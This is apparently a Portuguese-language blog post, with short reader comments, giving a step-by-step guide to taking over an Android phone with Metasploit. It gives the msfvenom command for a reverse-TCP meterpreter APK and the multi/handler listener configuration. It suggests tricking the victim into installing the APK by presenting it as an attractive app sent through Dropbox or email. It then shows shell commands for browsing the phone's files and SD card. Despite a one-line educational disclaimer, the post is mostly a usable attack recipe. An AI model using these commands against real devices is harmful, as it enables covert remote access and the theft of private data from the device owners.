Eu já abordei o uso de Metasploits em KALI LINUX , portanto, para um melhor entendimento, recomendo a leitura desse post; pois não serei repetitivo.
OBSERVAÇÃO:
O procedimento a seguir, foi executado em laboratório, este post é para fins educativos. Por favor, não invada a privacidade de ninguém sem permissão.
REQUISITOS:
– Kali Linux instalado em uma máquina virtual
– A VÍTIMA DEVE ESTAR NA MESMA REDE DE WIFI.
COMO HACKEAR O ANDROID USANDO METASPLOITS
- Abri o terminal do Kali Linux e escrevi o seguinte comando:
msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 R > andro.apk
“Substitui xxx.xxx.xxx.xxx pelo meu endereço IP (foi só digitar myip address na pesquisa do Google)”.
- Agora, que o payload foi criado, enviei ao telefone vítima; normalmente os invasores fazem isso através do Dropbox, e-mail ou qualquer outra maneira que a vítima possa abri-lo! Fingem que se trata de um ótimo aplicativo e você deve instalar.
- A seguir, digitei:
msfconsole
e abri no aparelho da vítima
- Digitei:
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST xxx.xxx.xxx.xxx
set LPORT 4444
exploit
- Agora, quando a vítima executar o aplicativo – ele ficará todo tempo em background (segundo plano) até que o aparelho seja reinicializado – e o invasor verá a abertura de uma sessão.
- Ao digitar:
shell
ls
… pude ver todas as pastas na raiz do celular Android vítima
8. Para acessar o cartão de memória, bastou digitar
cd sdcard
ls
Aguardem o próximo post, será um complemento deste.
O dispositivo alvo deve realizar o root obrigatoriamente?
CurtirCurtir
Não, root não é necessário.
CurtirCurtido por 1 pessoa
Digo, não precisa para acessar o sdcard. Para arquivos na raiz precisa.
CurtirCurtido por 1 pessoa